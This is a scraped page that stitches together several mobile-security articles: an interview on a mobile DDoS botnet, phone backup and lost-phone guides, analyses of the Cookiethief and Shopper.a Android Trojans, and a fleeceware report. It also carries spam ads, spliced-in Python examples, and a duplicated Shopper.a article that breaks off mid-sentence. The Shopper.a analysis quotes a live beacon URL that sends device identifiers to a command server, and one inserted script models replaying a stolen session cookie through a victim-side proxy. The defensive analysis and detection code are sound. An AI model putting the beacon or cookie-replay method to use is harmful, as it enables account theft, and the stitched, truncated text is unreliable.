Lukas Stefanko: How we fought off a DDoS attack from a mobile botnet

Hot on the heels of his research into an attack that attempted to take down ESET’s website, Lukas Stefanko sheds more light on threats posed by mobile botnets

In the course of fighting off a DDoS attack on ESET’s infrastructure, ESET researchers discovered a malicious mobile app that was used to generate the flood of requests to its website. ESET Malware Researcher Lukas Stefanko analyzed the app and published his findings yesterday. We sat down with him to ask a few follow-up questions.

The attack was conducted using a mobile app – is it a common vector for DDoS attacks?

On one hand, mobile-based DDoS attacks are quite rare. DDoS attacks are still typically launched via personal computers or servers. However, the times, they are changing. Mobile devices grow more powerful, their connectivity grows faster… If their share of overall internet traffic, I mean in the consumer space, is set to surpass that of computers, we can’t expect criminals to shy away from using them for their attacks.

By the way, the capability to perform a DDoS attack is missing in the MITRE ATT&CK knowledge base of malicious mobile techniques. We’ve submitted it as a new technique because we think this threat will keep growing and that defenders should be aware of it.

The attack on our infrastructure serves as a good illustration: the criminals managed to reach over fifty thousand installs with their app, which is by no means a low number. However, in the past, there were numerous cases of mobile adware reaching millions of installs before being detected. This shows that it’s possible to quickly build a relatively strong botnet.

Criminals tend to follow some goals with their action. Do you have any clue what their goal was with that DDoS attack?

In short – no, we can only speculate. However, the only net effect of the attack was that they exposed their botnet, we reported the app they used and it has been taken down from the Play store and wiped from the users’ devices – those with the Google Protect feature turned on. Practically, this DDoS tool no longer exists.

So, game over?

Well… with a few caveats, yes.

The app may also have been downloaded from unofficial app stores, and there are no means of wiping those installs from the infected devices. Also, the app may still be lurking in some places outside the Play store. However, we haven’t seen any such distribution mechanism, so, in my opinion, this is not a real threat.

Besides that, the website that acts as C&C server is still functional. However, without a significant number of infected devices, the website is useless.

How come no security mechanism detected the app prior to it being listed onto the official Android store?

Look, the diversity of apps is beyond imagination. The number of features is high, and their combinations are endless. Despite this, the apps that are outright malicious get caught, with rare exceptions. In this particular case, the app that was ultimately used for the attack is not malicious per se. It is capable of contacting a defined website and loading a script from it, a feature which is quite standard in many apps. And it’s the script that makes the app malicious.

Probably, all the apps that have the functionality of downloading anything should be examined taking the downloaded content into account…

Unfortunately, it’s not that simple. Keep in mind that what the app downloads may be changed at any moment…

Does this mean that there is no viable way to prevent this type of malicious app from sneaking into the Store?

Well, while I’m not going to disclose any details, we’ve improved our detection systems. So, based on this experience, chances are that we will be able to flag similar Trojans to Google.

Given the fact that safeguarding an app store can never be bulletproof – seems that there is a need for additional protections at the endpoint level…

This is nothing new, nor is it limited to any particular platform. With the ever-growing variability and sophistication of attacks, you can never rely on a single layer of protection. Ideally, you should defend yourself at every point of the attack chain – starting with securing the source, all the way through post-execution stages, should the malware reach them.

I’d like to stress that, based on what we have learned by analyzing this attack, we have improved our detection mechanisms, including our machine learning-based detections.

So similar malicious apps should be prevented from sneaking onto devices protected by ESET’s mobile security solution?

In principle, yes. Our users should be safe from this threat. However, the improvements I mentioned relate mostly to post-processing protective technologies – which means the threat might make it onto the device.

After the malware gets processed by our backend system and the newly created detections are pushed onto the protected devices, the malicious app would be detected and flagged to the user.



Editor


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Have you backed up your smartphone lately?

With World Backup Day upon us, we walk you through the ways to back up your iPhone or Android phone so that your personal information remains safe

In your pocket, you carry a supercomputer that outperforms all the tech that landed Aldrin and Armstrong on the moon. Although you may have heard this claim before, it probably never really resonated with you. Now, if we rephrase that to “you carry a device in your pocket that stores almost every aspect of your life, from memories in the form of photographs to personal notes, reminders, passwords and all kinds of sensitive data”, suddenly it feels a bit more personal.

What if your phone gets locked up by a ransomware attack, stolen, bricked or even destroyed? Would you lose everything on it, or do you back it up regularly?

If you don’t back up your phone regularly, then you should start right now. And since we are celebrating World Backup Day today, we’re going to walk you through the ways to do it on both iOS and Android-powered devices.

Backing up your iOS device

When backing up your iPhone, or any other device running iOS, you have two main options to choose from. The first is storing a backup of your device on your computer, or on removable storage connected to it. On Windows, or on macOS Mojave or earlier, the process uses iTunes: you’ll first have to install Apple’s iTunes software on your computer, since you won’t be able to manage your device without it (Macs have it installed by default). If you’re running macOS Catalina, then instead of iTunes you’ll find the option in the Finder.

To start the process, connect your device to your computer using the Lightning cable you usually use to charge it.

You will get a prompt to unlock your device using your preferred method (Face ID, Touch ID or passcode). You may also be prompted to Trust This Computer so that your device can sync with it without a problem.

You then click on your device in iTunes or in the Finder, depending on your operating system, and proceed with the process. For an extra layer of security, you can choose to encrypt the backup that will be stored locally on your computer; an encrypted backup is also the only kind that includes your saved passwords and Health data, so it is worth the extra step. Now just click the Back Up Now button and you’re set. While you’re at it, you can also choose to back up your most important data to iCloud.

This leads us to the other available option, and that is backing up your iPhone to your iCloud straight from your device. Go to the settings on your device and tap on your name and then tap on the iCloud button. Now toggle the iCloud Backup button to turn it on and then press the Back Up Now option.

While backing up, you should be connected to a trusted Wi-Fi network. You can set your iPhone to back up to iCloud automatically when it’s connected to a Wi-Fi network. Depending on the storage space you have on iCloud (the free tier is 5GB), you can also toggle which apps store data there.

For example, photos can be quite taxing: depending on their quality, their size can range from roughly 1 MB to 10 MB, or even 100 MB or more for videos. So you might need to either expand your storage or move the media files to another repository.

RELATED READING: Types of backup and five backup mistakes to avoid

Backing up your Android device

Now, Androids are a different beast in that you don’t really need any software suite installed on your computer to manage your Android device or its storage. To back up your photos and media onto your computer, all you have to do is plug it into your computer using a USB cable.

The phone will then ask whether to allow your computer to access your phone data, which you need to allow. Your phone will then appear in File Explorer (Windows) or the Finder (macOS), and you can browse the files on your device and copy them, or drag and drop them, into a folder of your choice.

To put it in simple terms: your Android device basically functions as an external storage device such as a USB or an external drive. Although it’s worth mentioning that some manufacturers do have software, such as Samsung’s DeX, but you don’t necessarily have to use it.

As with iOS devices though, there is another option – you can back up your data to the cloud. Backup options here vary from brand to brand, with many offering their own take on how to store your data; to make this a bit simpler, we’re going to stick to Google’s version since it should be available across most Android devices.

The most straightforward route is going to the settings, then scrolling down until you find Google Settings. Once you’ve tapped on that button, it should redirect you to the Google Settings menu, where you’ll find the Backup option (which may have slightly different names on different versions of the OS).

You can toggle the Backup option on and then press the Back up now button, which backs up your data to Google Drive. There is also a separate option to back up your photos and videos with the Google Photos app.

And always remember…

Regardless of which kind of device you have, the best practice is to have multiple backups of your data so that in case you lose your phone or one of your backups gets corrupted, you’ll have an extra one to fall back on. Never underestimate the value of planning ahead, since it can save you from a migraine later on.
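A backup you have never verified is only a hope. The script below is an added example, not code from this article: it records a SHA-256 manifest of a phone export copied over USB and then checks each additional copy against that manifest, so a silently damaged video or a lost contacts file is reported instead of discovered on the day you need it. The directory layout, file names and the corrupted byte are all constructed for the demonstration.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

CHUNK = 1 << 20  # hash in 1 MiB chunks so large videos are never read into memory at once


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_copy(root: Path, manifest: dict) -> dict:
    """Compare one backup copy against the manifest taken from the original export."""
    result = {"ok": [], "corrupted": [], "missing": [], "extra": []}
    present = build_manifest(root)
    for rel, digest in manifest.items():
        if rel not in present:
            result["missing"].append(rel)
        elif present[rel] != digest:
            result["corrupted"].append(rel)
        else:
            result["ok"].append(rel)
    result["extra"] = sorted(set(present) - set(manifest))
    return result


def demo() -> dict:
    """Constructed scenario: one export, two copies, the second copy silently damaged."""
    work = Path(tempfile.mkdtemp())
    export = work / "phone_export"
    (export / "DCIM").mkdir(parents=True)
    (export / "DCIM" / "IMG_0001.jpg").write_bytes(os.urandom(4096))
    (export / "DCIM" / "VID_0002.mp4").write_bytes(os.urandom(3 * CHUNK + 17))
    (export / "contacts.vcf").write_text("BEGIN:VCARD\nFN:Example\nEND:VCARD\n")

    manifest = build_manifest(export)           # record digests right after the export
    copy_a = shutil.copytree(export, work / "backup_usb")
    copy_b = shutil.copytree(export, work / "backup_nas")

    # Simulate bit rot / a bad sector: flip one bit deep inside the video on copy B,
    # and lose one file outright. Neither shows up in a directory listing.
    damaged = Path(copy_b) / "DCIM" / "VID_0002.mp4"
    data = bytearray(damaged.read_bytes())
    data[CHUNK + 5] ^= 0x01
    damaged.write_bytes(data)
    (Path(copy_b) / "contacts.vcf").unlink()

    return {
        "usb": verify_copy(Path(copy_a), manifest),
        "nas": verify_copy(Path(copy_b), manifest),
    }


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, {k: len(v) for k, v in report.items()})
```

Keep the manifest with the export (and a second copy elsewhere), and rerun `verify_copy` whenever a copy is refreshed; a manifest that lives only on the copy it describes can be corrupted along with it.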



Amer Owaida



What to do if your phone is lost or stolen

Losing your smartphone can be expensive, but the cost of the device may not be the final price you’ll be paying

According to a Prey study of 2018 reports from its customers of lost mobile devices, 69% were misplaced and 31% were stolen in various ways. Since smartphones have become the centerpiece of our digital identities, where we check our email, stay connected on social media, keep our diaries and pay for things, losing one is especially unnerving. Your phone holds a virtual truckload of sensitive personal information that can be exploited for a host of nefarious actions should it fall into the wrong hands.

Securing your device starts well before it is stolen or misplaced, so what steps should you take before and after your phone goes missing?

Back up your phone, store the data somewhere safe

This step should be a no-brainer but if you haven’t gotten around to it yet, then you should do it as soon as possible, like: now. There are multiple ways to go about it, and we looked at backup options for smartphones in greater detail last week.

In a nutshell, you can save a local backup file that includes all the bare necessities, such as contacts, messages and photos, on your computer. Doing that once a month will probably save you a headache in the long run.

Alternatively, you can enable the auto-backup feature on your phone, which regularly backs up your data to the cloud, or you can back up your files to the cloud manually. To be safe, do both and keep multiple copies, in case your computer fails or your files get wiped. The cloud option is also convenient because, if your phone is stolen, you can easily set up a new phone from your stored data.

Lock it up like Fort Knox

Nowadays, smartphones offer myriad ways to lock them down tight. The best option is to go with a combination of a strong passcode and a biometric lock, such as a fingerprint.

Biometrics add an extra layer of security, which is always helpful. As for the passcode itself, don’t just go with the default option: make it more complex. Some systems allow you to increase the length of the passcode, while some give you the option to choose an alphanumeric code. The more complicated the password, the harder it is for a thief to break it.

Find my phone

Depending on your phone brand or the system you’re running, it almost certainly has a “find my phone” option installed. iPhones have the oddly named Find My app, Samsungs have Find My Mobile, and Androids in general have Find My Device. All of them have to be enabled to work, of course, so if you haven’t done that yet, you know the drill. Regardless of the brand you’re using, we can’t stress this enough: you should have this option turned on. It not only helps you find your device, but the app usually includes several security features as well.

You can log into the associated service through a browser and use the features from the menu. If you just misplaced the phone, you can choose the ring option. This makes the phone emit a sound, so you can hear it if you’re in the vicinity. If you haven’t properly secured your device, you can lock it remotely from here, and you can display a message on the lock screen for a good Samaritan willing to return the phone.

RELATED READING: 20 tips for 2020: Be smarter with your smartphone

Finally, you have the nuclear option of erasing your phone remotely. If you do that, you might not be able to track your phone any longer, so only use this option as a final resort. You will lose your phone, but at least your data will remain private and nobody with malicious intent can exploit it. Reputable security software, too, often includes lock, locate and remote-wipe functionalities.

If you’re certain that you’ll never see your device again, contact your carrier and report the phone lost or stolen; they will deactivate your SIM card so it can’t be misused. If your phone is insured, you can also file an insurance claim, and hopefully that will cover at least some of your losses.

Be prepared

Planning ahead can save you from a lot of headaches in the event you do misplace your device. To sum it up – secure your phone, back up all the data, and set up the ‘find my phone’ feature. Should your device be stolen or lost, you can at least be certain that you’ve done everything possible to secure it and facilitate its return.



Amer Owaida



Cookiethief: a cookie-stealing Trojan for Android

We recently discovered a new strain of Android malware. The Trojan (detected as Trojan-Spy.AndroidOS.Cookiethief) turned out to be quite simple. Its main task is to acquire root rights on the victim’s device and transfer the cookies used by the browser and the Facebook app to the cybercriminals’ server. The technique does not rely on a vulnerability in the Facebook app or the browser itself: malware with root access could steal the cookie files of any website from other apps in the same way and achieve similar results.

How can stealing cookies be dangerous? Besides various settings, web services use them to store on the device a unique session ID that identifies the user without a login and password. A cybercriminal armed with that cookie can therefore pass himself off as the unsuspecting victim and use the account for personal gain.

The package name of the Cookiethief malware is com.lob.roblox, which resembles that of the Roblox Android gaming client (com.roblox.client) but has nothing in common with Roblox.

Malicious features of Trojan-Spy.AndroidOS.Cookiethief

To execute superuser commands, the malware connects to a backdoor installed on the same smartphone and passes it a shell command for execution. The backdoor, Bood, located at /system/bin/.bood, launches a local server and executes the commands it receives from Cookiethief.

On the C&C server we also found a page advertising services for distributing spam on social networks and messengers, so it was not difficult to guess the motive behind the cookie-theft operation.

But there’s still a hurdle that prevents the spammers from gaining instant access to accounts. For example, if Facebook detects atypical user activity, the account may be blocked.

However, during our analysis of Cookiethief, we uncovered another malicious app with a very similar coding style and the same C&C server. The second “product” from (presumably) the same developers (detected as: Trojan-Proxy.AndroidOS.Youzicheng) runs a proxy on the victim’s device.

We believe that Youzicheng is tasked with bypassing the security systems of the relevant messenger or social network by routing traffic through a proxy server on the victim’s device. As a result, the cybercriminals’ requests to the website look like requests from the legitimate account holder and do not arouse suspicion.

To implement this method, an executable file is first downloaded, then the proxy configuration is requested, and finally the downloaded file is run.

By combining these two attacks, cybercriminals can gain complete control over the victim’s account without raising suspicion at Facebook. These threats are only just starting to spread; according to our data the number of victims does not exceed 1,000, but the figure is growing.
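The two halves of the operation fit together because of how session cookies work, and the model below is an added example written to illustrate the two preceding paragraphs, not code from this report or from the malware. It is a toy server-side session table: the password is checked once at login, after which the opaque ID in the cookie is the only credential. A replay of a stolen cookie from the spammers’ own server trips a simple “atypical activity” heuristic (different client address or client profile), while the same replay routed through a proxy on the victim’s phone looks exactly like the victim. The IP addresses, user agent string and heuristic are constructed assumptions, not details from the analysis.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    client_ip: str
    user_agent: str


class SessionStore:
    """Toy server-side session table keyed by the opaque ID carried in the cookie."""

    def __init__(self) -> None:
        self._sessions = {}

    def login(self, user: str, password_ok: bool, client_ip: str, user_agent: str) -> str:
        # The password is checked exactly once, here. From now on the cookie alone
        # is the credential, which is what makes stealing the cookie file worthwhile.
        if not password_ok:
            raise PermissionError("bad password")
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, client_ip, user_agent)
        return f"session_id={sid}"

    def check(self, cookie: str, client_ip: str, user_agent: str) -> tuple:
        """Return ('allow', user), ('challenge', user) or ('deny', None)."""
        sid = cookie.partition("=")[2]
        s = self._sessions.get(sid)
        if s is None:
            return ("deny", None)
        # Constructed account-protection heuristic: the same session suddenly used
        # from another network or another client profile counts as atypical activity.
        if s.client_ip != client_ip or s.user_agent != user_agent:
            return ("challenge", s.user)
        return ("allow", s.user)


VICTIM_IP = "203.0.113.7"       # constructed: the victim's mobile network address
ATTACKER_IP = "198.51.100.20"   # constructed: the spammers' own server
VICTIM_UA = "Mozilla/5.0 (Linux; Android 9) Mobile Chrome/80"  # constructed


def scenario() -> dict:
    store = SessionStore()
    cookie = store.login("victim", True, VICTIM_IP, VICTIM_UA)
    stolen_cookie = cookie  # exfiltrated from the device's cookie file by the spy component

    return {
        # the victim keeps using the account normally
        "victim": store.check(cookie, VICTIM_IP, VICTIM_UA)[0],
        # replay straight from the spammers' infrastructure: new address, flagged
        "attacker_direct": store.check(stolen_cookie, ATTACKER_IP, VICTIM_UA)[0],
        # replay through a proxy running on the victim's phone: indistinguishable
        "attacker_via_victim_proxy": store.check(stolen_cookie, VICTIM_IP, VICTIM_UA)[0],
        # a cookie nobody issued is simply rejected
        "guessed_cookie": store.check("session_id=" + secrets.token_urlsafe(32), VICTIM_IP, VICTIM_UA)[0],
    }


if __name__ == "__main__":
    for who, verdict in scenario().items():
        print(f"{who:28s} {verdict}")
```

The model also shows why the Trojan needs a root backdoor at all: on an unrooted device each app’s cookie store is readable only by that app, so the bearer token never leaves its sandbox. On the server side, short session lifetimes and re-authentication before sensitive actions limit how long a stolen cookie stays useful.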

Through the C&C server addresses and encryption keys used, Cookiethief can be linked with such widespread Trojans as Sivu, Triada, and Ztorg. Usually, such malware is either planted in the device firmware before purchase, or it gets into system folders through vulnerabilities in the operating system and then can download various applications into the system. As a result, a persistent backdoor like Bood, along with the auxiliary programs Cookiethief and Youzicheng, can end up on the device.

We detect com.lob.roblox as HEUR:Trojan-Spy.AndroidOS.Cookiethief, org.rabbit as HEUR:Trojan-Proxy.AndroidOS.Youzicheng, and Bood as HEUR:Backdoor.AndroidOS.Bood.a.

IOCs

 



Smartphone shopaholic | Securelist

Have you ever noticed strange reviews of Google Play apps that look totally out of place? Their creators might give it five stars, while dozens of users rate it with just one, and in some cases the reviews seem to be talking about some other program entirely.

If so, you may be unknowingly acquainted with the work of Trojan-Dropper.AndroidOS.Shopper.a.

How Shopper.a works

Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain apps’ ratings and inflate their numbers of installations and registrations. Among other things, this can be used to dupe advertisers. The Trojan can also display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions.

Back to the suspicious reviews: Trojan-Dropper.AndroidOS.Shopper.a can open Google Play (or another app store), install several programs, and write fake user reviews of them. To keep the user from noticing anything untoward, the installation window is concealed behind the app’s “invisible” window. The lack of permission to install apps from third-party sources is no obstacle to the Trojan: it grants itself the requisite permissions through AccessibilityService. Google intended this service to make smartphones easier to use for people with disabilities, but in the hands of cybercriminals it poses a serious threat to device owners. With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps: it can read data displayed on the screen, click buttons, and emulate user gestures.

Masquerading as a system app, the malware misleads the user by using the system icon and the name ConfigAPKs. What caught our eye was the app’s heavy obfuscation and its suspicious use of AccessibilityService.

Distribution of Trojan-Dropper.AndroidOS.Shopper.a, October – November 2019

Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019. Second place went to Brazil (18.70%) and third to India (14.23%).

Technical details

At startup, once the screen is unlocked, the app decrypts and downloads the payload.

The Trojan then collects information about the victim’s device (country, network type, vendor, smartphone model, email address, IMEI, IMSI) and forwards it to the cybercriminals’ server at:

http://api.adsnative123[.]com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&time=1567059364545&lang=en&udid=dc9c9a616665e073&unkown=true&pname=com.cleaner.qefey.kslr&size=800_561&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&anum=8&s_udid=&native=2&key=…
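A beacon like the one above is easy to catch in proxy or gateway logs once you know what to look for: a known C&C host, or a single GET carrying many device identifiers at once. The script below is an added example, not code from this report: it parses each request URL, pulls out the identifying parameters, and flags a line either on the host (kept defanged in the rule set, as in the IOCs, and refanged at load time) or on how many fingerprint fields it carries. The log line layout and the two benign lines are constructed; the first URL is the one quoted above, refanged as a real log would record it, with the key value left truncated as it is in the report.

```python
from urllib.parse import urlsplit, parse_qs

# Known C&C host from the report, kept defanged in the rule set.
KNOWN_C2_HOSTS = {"api.adsnative123[.]com"}

# Query parameters the beacon above uses to describe the device. Several of them
# appearing together in one request is a strong signal even for an unknown host.
FINGERPRINT_PARAMS = {"udid", "gaid", "pname", "osv", "geo", "network", "lang", "sdk_v", "sid"}


def refang(host: str) -> str:
    return host.replace("[.]", ".")


def analyse_request(url: str) -> dict:
    """Break one request URL into host, fingerprint fields and a rule verdict."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    fingerprint = {k: params[k][0] for k in sorted(FINGERPRINT_PARAMS) if k in params}
    host = parts.hostname or ""
    return {
        "host": host,
        "known_c2": host in {refang(h) for h in KNOWN_C2_HOSTS},
        "fingerprint": fingerprint,
        "fingerprint_score": len(fingerprint),
        "plain_http": parts.scheme == "http",  # the beacon travels unencrypted
    }


# Constructed proxy log: "<epoch> <client ip> <method> <url>" per line.
SAMPLE_PROXY_LOG = """\
1567059364 203.0.113.7 GET http://api.adsnative123.com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&time=1567059364545&lang=en&udid=dc9c9a616665e073&unkown=true&pname=com.cleaner.qefey.kslr&size=800_561&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&anum=8&s_udid=&native=2&key=...
1567059370 203.0.113.7 GET https://www.example.com/index.html
1567059375 203.0.113.9 GET http://ads.example.net/track?udid=abc&osv=10
"""


def scan_log(text: str, min_score: int = 4) -> list:
    """Return one hit per log line that matches a known host or over-shares identifiers."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        verdict = analyse_request(fields[3])
        if verdict["known_c2"] or verdict["fingerprint_score"] >= min_score:
            hits.append({"ts": int(fields[0]), "src": fields[1], **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_PROXY_LOG):
        print(hit["src"], hit["host"], "known_c2" if hit["known_c2"] else "",
              "fingerprint fields:", hit["fingerprint_score"], hit["fingerprint"].get("pname"))
```

The `pname` field is the most useful pivot in an incident: it names the installed package that sent the beacon, which is what you search for across the rest of the fleet.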

In response, it receives a set of commands:

Depending on the commands, Shopper.a can:

  • Open links received from the remote server in an invisible window (checking first that the device is connected to a mobile network).
  • After a certain number of screen unlocks, hide itself from the apps menu.
  • Check whether AccessibilityService rights have been granted and, if not, periodically pester the user with a phishing-style request to grant them.
  • Disable Google Play Protect.
  • Create shortcuts to advertised sites in the apps menu.
  • Download apps from the third-party “market” Apkpure[.]com and install them.
  • Open advertised apps on Google Play and “click” to install them.
  • Replace shortcuts to installed apps with shortcuts to advertised sites.
  • Post fake reviews supposedly from the Google Play user.
  • Show ads when the screen is unlocked.
  • Register users through their Google or Facebook accounts in a number of legitimate apps (such as in travel, retail, utilities and media categories) including the following apps:

Disclaimer: The malware described above does not exploit any vulnerabilities in the legitimate apps it downloads and in which it registers users. It only abuses the Android Accessibility Service.

Conclusion

As noted above, one of the things that drew our attention was the use of AccessibilityService. This service is usually accessed by people with vision problems to facilitate smartphone use, such as having the names of app controls, web page content, etc., read out automatically. In other cases, it can be used to emulate on the app screen physical smartphone keys that have stopped working. If access is requested by a program whose functionality does not require AccessibilityService, be wary. And the best option is not to install apps from dubious sources at all, including from ads, whatever they promise. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that its creators will not change the payload at some later date. In any event, it’s worth getting hold of a mobile security solution that can independently detect and block dangerous apps.
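Since the whole attack hinges on an accessibility service the user should never have granted, the first thing to check on a suspect device is which services are enabled. The script below is an added example, not code from this report: it parses the value of the `enabled_accessibility_services` secure setting (a colon-separated list of `package/class` component names, or the string `null` when empty) as returned by `adb shell settings get secure enabled_accessibility_services`, together with the `accessibility_enabled` master switch, and flags any service whose package is not on an allowlist or whose name tries to look like a platform component. The sample output, the allowlist and the `ConfigAPKsService` class name are constructed; the flagged package name is the `pname` from the beacon quoted earlier in this report.

```python
# Constructed output of:
#   adb shell settings get secure enabled_accessibility_services
#   adb shell settings get secure accessibility_enabled
SAMPLE_ENABLED_SERVICES = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.cleaner.qefey.kslr/com.cleaner.qefey.kslr.ConfigAPKsService"
)
SAMPLE_ACCESSIBILITY_ENABLED = "1"

# Assumed allowlist of packages that legitimately need the service; tune it per fleet.
ALLOWLIST = {"com.google.android.marvin.talkback"}

# Words a malicious service picks to pass for a system component (the report's sample
# called itself ConfigAPKs). Only suspicious when the package is not a platform package.
SYSTEM_LOOKING = ("config", "system", "android", "update")
PLATFORM_PREFIXES = ("com.android.", "com.google.")


def parse_component(flat: str) -> tuple:
    """Split Android's flattened ComponentName 'pkg/cls'; '.Cls' is shorthand for 'pkg.Cls'."""
    pkg, _, cls = flat.partition("/")
    if cls.startswith("."):
        cls = pkg + cls
    return pkg, cls


def parse_component_list(value: str) -> list:
    value = value.strip()
    if not value or value == "null":
        return []
    return [parse_component(item) for item in value.split(":") if item]


def audit(enabled_services: str, accessibility_enabled: str, allowlist: set) -> list:
    """One finding per enabled accessibility service, with the reasons it was flagged."""
    active = accessibility_enabled.strip() == "1"
    findings = []
    for pkg, cls in parse_component_list(enabled_services):
        reasons = []
        if pkg not in allowlist:
            reasons.append("package not on accessibility allowlist")
        simple_name = cls.rsplit(".", 1)[-1].lower()
        if any(w in simple_name for w in SYSTEM_LOOKING) and not pkg.startswith(PLATFORM_PREFIXES):
            reasons.append("system-sounding service name from a non-platform package")
        findings.append({
            "package": pkg,
            "class": cls,
            "active": active,
            "flagged": bool(reasons),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_ENABLED_SERVICES, SAMPLE_ACCESSIBILITY_ENABLED, ALLOWLIST):
        mark = "FLAG" if f["flagged"] else " ok "
        print(mark, f["class"], "; ".join(f["reasons"]))
```

A flagged package is the starting point, not the verdict: pull its APK with `adb shell pm path <package>` and check its signer and install source before deciding it is the dropper.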

IOCs

MD5

  • 0a421b0857cfe4d0066246cb87d8768c
  • 0b54b822683a70b9d4a3af08a2d506b2
  • 0b682e9cae5b8623fc3e62048623dcdb
  • 0ea057c5294a6cbfeffd2e91ae945981
  • 0eb70afbb011916facf075f80cc07605
  • 1a6d60b97fdeb29afc0bd16fcaa92d3a
  • 1e82c197037ff0e21ccbc8c6161144c8
  • 1e937712ca84a6364226a35e2fd9a550
  • 1f13ba11ceba8ddb6e0faf61e6d8da23
  • 2d234accdc400c892657b8568e217593
  • 2d755050c896aed9701aa78a3668bf72
  • 3a5ed5f6ecaa71f5c7b7447c1f451144
  • 3ad3f270aef9f56d9117f711a3783a4a
  • 3b1a2420c4afc019a19481a6f4282894
  • 3c312fbb18e7822f87334a9366baf9fc
  • 3cadeea4dedaf7d7db8b84d52cd6caea
  • 03ccb6adbe12daef1b40f7a6d7d26dbc
  • 3dc6538239e90e51233789c5876ccb71
  • 3fe0e78d451bb8389f1d8cb5009c3452
  • 4a3099f300741123e3c18b3a6d587ed8
  • 4e44fb07073ea46390ea94ce26d7d737
  • 5bbc06fc3058b76ee09d3cce608ebdda
  • 5c316045836c4b4110552cc80af2fe75
  • 5e313e5e4e37e87633ea342a24c27534
  • 6ec7e5334f8b11499c150ba28f06e78c
  • 7a0d40f3598a91fc1206b3b2bdd49c2c
  • 7c68eb0bd93d8cf27539d2ff7da5bb15

C&C

http://api.adsnative123[.]com



Over 600 Million Users Download 25 ‘Fleeceware’ Apps from the Play Store

Researchers at security firm Sophos have discovered a new set of Android apps on the Google Play Store that contain fleeceware. Notably, these apps have been downloaded and installed by over 600 million unsuspecting Android users.

The term ‘fleeceware’ was first coined in September 2019 by Sophos, after an investigation that uncovered a new kind of financial fraud on the legitimate Google Play Store.

Fleeceware is a new addition to the cybersecurity vocabulary. It refers to the abuse of the free-trial mechanism in Android apps: a short trial period is offered before the full subscription price is charged to the account the user signed up with.

Normally, users who register for an app’s trial period must cancel it manually to avoid being charged. However, many users simply stop using an app they don’t like and uninstall it, assuming that this ends the trial. It does not: the subscription stays active and the full amount is charged to the user’s account.

UK-based Sophos said it identified over two dozen Android apps containing fleeceware, charging somewhere between $100 and $240 per year for apps as basic and mainstream as barcode readers, calculators, and QR scanners.

Given the unusually high number of downloads for these apps, Sophos analyst Jagadeesh Chandraiah says it is likely that they used third-party pay-per-install services to inflate their download counts. He also suspects that the five-star reviews are fake and were bought to improve the apps’ ranking on the Play Store and so lure a larger number of users.

Warning the users in their report, Sophos told, “If you have an Android device and use the Google Play Store for apps, you should rigorously avoid installing these types of “free trial” apps that offer subscription-based charges after a short trial.”

“If you do happen to have a free trial, make sure you understand that merely uninstalling the app does not cancel the trial period. Some publishers require you to send a specific email or follow other complicated instructions to end the free trial before you are charged, though you might just need to log into your Google Pay to cancel. Keep copies of all correspondence with the publisher, and be prepared to share that with Google if you end up disputing the charges,” the report further read.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Smartphone shopaholic | Securelist

Have you ever noticed strange reviews of Google Play apps that look totally out of place? Their creators might give it five stars, while dozens of users rate it with just one, and in some cases the reviews seem to be talking about some other program entirely.

If so, you may be unknowingly acquainted with the work of Trojan-Dropper.AndroidOS.Shopper.a.

How Shopper.a works

Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain apps’ ratings and increase their number of installations and registrations. All this can be used, among other things, to dupe advertisers. What’s more, the Trojan can display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions.

Back to the suspicious reviews: Trojan-Dropper.AndroidOS.Shopper.a can open Google Play (or another app store), install several programs, and write fake user reviews of them. So that the user does not notice anything untoward, the installation window is concealed behind the app’s “invisible” window. The lack of permission to install apps from third-party sources is no obstacle to the Trojan: it grants itself the requisite permissions through AccessibilityService. Google intends this service to make smartphones easier to use for people with disabilities, but in the hands of cybercriminals it poses a serious threat to device owners. With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps: for instance, it can intercept data displayed on the screen, click buttons, and emulate user gestures.

Masquerading as a system app, the malware misleads the user by using the system icon and the name ConfigAPKs. Our attention was drawn by the app’s heavy obfuscation and its suspicious use of AccessibilityService.

Distribution of Trojan-Dropper.AndroidOS.Shopper.a, October – November 2019

Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019. Second place went to Brazil (18.70%) and third to India (14.23%).

Technical details

At startup, after the screen is unlocked, the app decrypts and downloads the payload.

Then the Trojan collects information about the victim’s device (country, network type, vendor, smartphone model, email address, IMEI, IMSI) and forwards it to the cybercriminals’ server at:

